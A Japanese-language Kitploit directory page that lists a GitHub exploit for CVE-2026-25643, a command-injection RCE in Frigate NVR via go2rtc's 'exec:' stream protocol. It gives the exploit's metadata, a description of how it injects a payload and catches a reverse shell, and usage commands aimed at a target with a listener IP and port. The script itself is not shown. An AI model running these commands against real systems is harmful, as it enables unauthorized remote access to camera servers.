Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-25643-Frigate-RCE — go2rtc exec: プロトコルインジェクションを介したFrigate NVRの認証済みRCEのエクスプロイト。システムコマンド実行とリバースシェルキャプチャを自動化します。 | Kitploit
ツール/GitHubGitHub/jduardo2704/cve-2026-25643-frigate-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツール
GitHubjduardo2704/cve-2026-25643-frigate-rce

CVE-2026-25643-Frigate-RCE

go2rtc exec: プロトコルインジェクションを介したFrigate NVRの認証済みRCEのエクスプロイト。システムコマンド実行とリバースシェルキャプチャを自動化します。

リポジトリを見る
337ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-25643:Frigate NVR <= 0.16.3 の認証済みRCE

エクスプロイトタイトル: Frigate NVR <= 0.16.3 - 認証済みリモートコード 実行
日付: 2026-02-05
エクスプロイト作者: jduardo2704
ベンダーホームページ: https://frigate.video/
ソフトウェアリンク: https://github.com/blakeblackshear/frigate
バージョン: <= 0.16.3
CVE: CVE-2026-25643 アドバイザリ: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x

説明

Frigate 0.16.3 までのバージョンは、go2rtc 設定を介したリモートコード実行(RCE)に対して脆弱です。認証済みアクセスを持つ攻撃者(インスタンスが公開されている場合は認証なし)は、exec: プロトコルを使用してストリーム設定にシステムコマンドを注入できます。このエクスプロイトはペイロードの注入を自動化し、サービスを再起動して、リバースシェルを取得します。

インストール

root@kitploit:~
pip install requests pyyaml

使用方法

認証モード:

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444

非認証モード(公開されている場合):

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444

免責事項

このスクリプトは教育目的および許可を得たセキュリティテスト専用です。

ツールをダウンロード